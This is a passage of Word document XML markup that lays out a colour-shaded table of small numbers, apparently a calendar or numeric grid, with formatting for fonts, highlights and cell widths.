                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>16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008080"/>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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="4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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>12</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gridSpan w:val="2"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>23</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="8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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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24</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30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25</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>30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23</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13</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24</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38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31</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>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260" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>31</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>27</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240" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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38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right="40"/>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0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>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200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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31</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>23</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4</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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008080"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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19</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33</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200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>12</w:t>
            </w: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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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18</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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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8080"/>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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>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8080"/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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28</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15</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300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20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23</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10</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38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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>7</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38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12</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33</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38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18</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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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22</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gridSpan w:val="2"/>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10</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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>2</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28</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31</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300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="darkCyan"/>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31</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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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24</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7</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11"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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008080"/>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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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14</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>33</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sz w:val="18"/>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8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="4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008080"/>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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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30</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sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>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008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>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12</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</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11</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16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21</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20</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8080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="220"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>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33</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11</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>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ind w:left="200"/>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25</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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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228" w:lineRule="exact"/>
              <w:ind w:left="8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highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="008080"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="darkCyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
